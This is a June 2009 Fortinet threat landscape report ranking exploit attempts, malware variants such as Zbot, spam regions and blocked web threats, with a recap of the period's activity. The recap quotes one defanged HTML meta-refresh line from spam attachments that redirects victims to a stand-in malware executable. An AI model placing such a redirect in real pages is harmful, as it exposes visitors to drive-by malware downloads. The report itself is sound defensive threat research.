Prevalence Report

Threat Landscape Report - June 2009 Edition

The following statistics are compiled from Fortinet's FortiGate network security appliances and intelligence systems for the period May 21st - June 20th, 2009.

Exploits and Intrusion Prevention

Top 10 Exploitations & Regions

Top 10 exploitation attempts detected for this period, ranked by vulnerability traffic. Percentage indicates the portion of activity the vulnerability accounted for out of all attacks reported in this edition. Severity indicates the general risk factor involved with the exploitation of the vulnerability, rated from low to critical. Critical issues are outlined in bold:

Rank	Vulnerability	Percentage	Severity
1	MS.Windows.MSDTC.Heap.Overflow	13.3	Medium
2	MS.SQL.Server.Empty.Password	10.0	High
3	MS.DCERPC.NETAPI32.Buffer.Overflow	6.9	Critical
4	SSLv3.SessionID.Overflow	5.5	High
5	HTTP.URI.Overflow	4.7	Critical
6	MS.Windows.NAT.Helper.DNS.Query.DoS	4.5	High
7	MS.Exchange.Mail.Calender.Buffer.Overflow	3.5	High
8	MS.SMB.DCERPC.SRVSVC.PathCanonicalize.Overflow	2.6	High
9	MS.Windows.Messenger.Service.Buffer.Overflow	1.4	High
10	FTP.Bounce.Attack	1.2	High

Figure 1a: Top 5 regions by detected exploit attempts

New Vulnerability Coverage

There were a total of 108 vulnerabilities added to FortiGuard IPS coverage this period.
Of these added vulnerabilities, 62 were reported to be actively exploited (57.4%).

Figure 1b breaks down added vulnerabilities by severity, coverage and active exploitation in the wild.

For more information, observe the detailed reports for this period at:

Intrusion Prevention - Service Update History

Figure 1b: New vulnerability coverage for this edition, categorized by severity

Malware Today

Top 10 Variants

Top 10 malware activity by individual variant. Percentage indicates the portion of activity the malware variant accounted for out of all malware threats reported in this edition. Top 100 shifts indicate positional changes compared to last edition's Top 100 ranking, with "new" highlighting the malware's debut in the Top 100. Figure 2 below shows the detected volume for the malware variants listed within the Top 5:

Rank	Malware Variant	Percentage	Top 100 Shift
1	W32/OnlineGames.BBR!tr	14.3	new
2	W32/Zbot.M!tr.pws	11.4	+55
3	W32/Zbot.V!tr.pws	7.5	new
4	W32/Virut.A	7.5	-2
5	JS/PackRedir.A!tr.dldr	4.2	+36
6	HTML/Iframe.DN!tr.dldr	3.2	-3
7	Adware/AdClicker	2.9	-2
8	W32/FraudLoad.EPB!tr	2.8	new
9	W32/Dloadr.CMV!tr	2.6	new
10	W32/Dropper.PTD!tr	2.6	-9

Figure 2: Activity curve for top five malware variants

Regions & Volume

Top 5 regions for this period, ranked by distinct malware volume reported. Distinct malware volume indicates the amount of unique virus names (variants) that has been detected in the given regions, as opposed to total malware volume, which indicates the accumulated amount of all reported incidents. Total and unique malware volume trends for the last six reporting periods are also given. Figures 3a-3c below show these statistics:

Figure 3a: Top 5 regions by distinct malware volume

Figure 3b: Six period trend for total malware volume

Figure 3c: Six period trend for unique malware volume

For more information on daily activity per region, please visit our Virus World Map.

Spam and Email Threats

Spam Rate & Regions

The global spam rate is shown on a daily basis for this edition's given period. Spam rate indicates the accumulated emails which have been tagged as spam, in comparison to total email traffic. Top 5 spam regions are ranked by received spam in comparison to global spam volume. Statistics are graphed for business working days, and shown in Figures 4a-4b below:

Figure 4a: Spam rate compared to global email

Figure 4b: Top 5 spam regions by received spam

Top 3 In The Wild

Top three email threats observed for this period. Top e-mails have been filtered to highlight diverse campaigns by removing duplicates and unsolicited advertisements. This helps focus on scams and malicious intent; the resulting list is ranked by Figures 5a-c below illustrate the most popular message tactics used during recent spam campaigns:

Figure 5a: Spam campaign #1

Figure 5b: Spam campaign #2

Figure 5c: Spam campaign #3

Crawling The Web

Web Traffic & Growth

The following list breaks down the percentage of activity blocked for selected Web categories throughout this period. Percentage indicates how much activity was accounted for out of the four selected categories. Figure 6a shows a different scope, comparing only threat traffic: Malware, spyware, and phishing. The percentage shown in Figure 6a below indicates how much activity was accounted for out of these three threat categories. Figure 6b highlights the growth (or reduction) of selected web threat activity when compared period over period:

Web Threat Category	Percentage
Pornography	51.3
Malware	38.6
Spyware	5.4
Phishing	4.7

Figure 6a: Threat traffic volume break-down

Figure 6b: Threat traffic growth by period

Activity Recap

There was quite a bit of interesting developments this period. Web threat traffic in general rose significantly, with a noticeable difference in malware and phishing. Figure 6b shows phishing growth at its highest yet; malware followed with a significant gain. This gain represents additional volume directed toward such malicious sites -- an ongoing trend as we continue to pave the way into the next generation of online services and threats. In tune with an increase of web-borne malware, Figure 3b also shows a steadily increasing detected volume rate. While malware detections have been increasing since March 2009, distinct volume (unique pieces of malicious code) detection remains relatively flat as seen in Figure 3b. Cyber criminals have been enjoying success by driving mass amounts of traffic to their threats, aided by a large online community utilizing a vast amount of vulnerable services.

Building off a year-high active exploitation rate of 46.4% from last report, 62 of 108 reported vulnerabilities this period had exploits launched against them. More than half of newly reported vulnerabilities this period have been attacked, with a 57.4% active exploitation rate. As seen in Figure 1a, this activity was primarily in the U.S. with Singapore jumping quickly into second place, followed by Spain entering the list in fifth position. Third and fourth place holders from last period maintained their positions.

For the first time in a long while, Netsky has been knocked out of our malware Top 10 list. Two of the main threat drivers we have seen this year -- Online Gaming Trojans and Virut -- remain very active with Online Gaming Trojans in first and tenth positions. W32/Virut.A, though falling two positions, held a strong fourth place amongst a barrage of Zbot activity. Two Zbot variants, W32/Zbot.M and W32/Zbot.V landed in second and third position respectively. Zbot, a very widespread and prevalent keylogging/data-siphoning trojan, was particularly active this month distributing its payload through fake eCard mail. The largest surge of Zbot activity can be seen in Figure 2, with W32/Zbot.M and W32/Zbot.V each going on two-day runs. Interestingly, JS/PackRedir.A moved up thirty-six positions to land in fifth place in our malware Top 10 list. This obfuscated javascript redirects unfortunate visitors to further malicious sites that host malicious components through PDF and SWF files. This underscores the popularity of obfuscated attacks, whether it be through binary packers or script obfuscators - and also helps contribute to the aforementioned growth in web-borne malware attacks.

There seemed to be no direct affect on spam rates following an applaudable take-down of 3FN/Pricewert, another alleged spam-centric network. Last November, after now infamous McColo went down, we saw quite a dip in spam rates that took more than two months to recover. Figure 4a shows a very consistent spam rate after the early June takedown of 3FN/Pricewert - and many spam campaigns still remain aggressive and active. France took top spot for regionally received spam (Figure 4b), with Canada and Spain, respectively, entering the Top 5 list in fourth and fifth positions. Figures 5a and 5b reflect this, with both e-mails under different social engineering hooks / campaigns linked to Zbot malware. Figure 5c shows the Canadian Pharmacy gang hopping on board the fake eCard train. The Canadian Pharmacy gang and other campaigns (as seen in Figures 5b and 5c), are using simple HTM file attachments to hook users. The HTM files generally contain this content:


meta http-equiv='Refresh' content='0; url=hxxp://maldomain.com/malfile.exe'

Solutions

Customers who use Fortinet’s FortiGuard Subscription Services should already be protected against the threats outlined in this report. Threat activity is compiled by Fortinet's FortiGuard Global Security Research Team using data gathered from its intelligence systems and FortiGate™ multi-threat security appliances in production worldwide. FortiGuard Subscription Services offer comprehensive security solutions including antivirus, intrusion prevention, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products.